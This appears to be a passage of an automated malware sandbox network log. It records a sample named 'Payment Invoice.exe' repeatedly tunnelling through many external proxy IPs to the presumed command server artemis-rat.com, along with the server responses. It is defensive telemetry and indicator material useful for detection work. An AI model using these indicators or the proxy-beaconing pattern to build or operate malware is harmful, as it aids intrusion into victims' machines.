                                                                Mar 11, 2024 16:15:25.714543104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                732192.168.2.451345161.97.173.42622897076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.395785093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.557306051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.589643955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.683345079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:41.777096033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:53.792367935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:05.886147976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:29.886128902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                733192.168.2.45143023.225.72.12535037076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.396699905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.511367083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.515206099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.515332937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                734192.168.2.45220839.108.229.1480027076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.402717113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.750705957 CET767INHTTP/1.1 403 Forbidden
                                                                Server: Beaver
                                                                Cache-Control: no-cache
                                                                Content-Type: text/html
                                                                Content-Length: 635
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                735192.168.2.45231252.73.224.5431287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.407495022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.624536037 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:17 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                736192.168.2.452269154.12.178.107299857076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.408477068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                737192.168.2.452221116.106.105.5510807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.420806885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                738192.168.2.45230567.43.236.2222117076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.420806885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.963788033 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                739192.168.2.452406104.20.233.70807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.429234028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.583411932 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:17 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                740192.168.2.452417172.67.181.11807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.442815065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.596935034 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:17 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                741192.168.2.452415172.67.25.204807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.442815065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.597212076 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:17 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                742192.168.2.451032142.54.231.3841457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.442960024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                743192.168.2.44995157.128.163.24280807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.443111897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.511357069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                744192.168.2.45230270.166.167.55577457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.449966908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                745192.168.2.451424200.70.34.2241537076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.450284004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                746192.168.2.452466104.16.109.143807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.457182884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.611335993 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:17 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                747192.168.2.45150524.176.53.18380807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.467109919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.511405945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.515206099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.515332937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:41.620737076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:53.623979092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:05.620543957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:29.620510101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:17.714312077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:19.968386889 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                748192.168.2.452483104.16.221.57807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.467219114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.621520996 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:17 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                749192.168.2.449827196.202.40.1731287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.477668047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.557413101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.589689016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.683343887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:41.777183056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:53.792362928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:05.889441013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:29.886446953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:18.011261940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
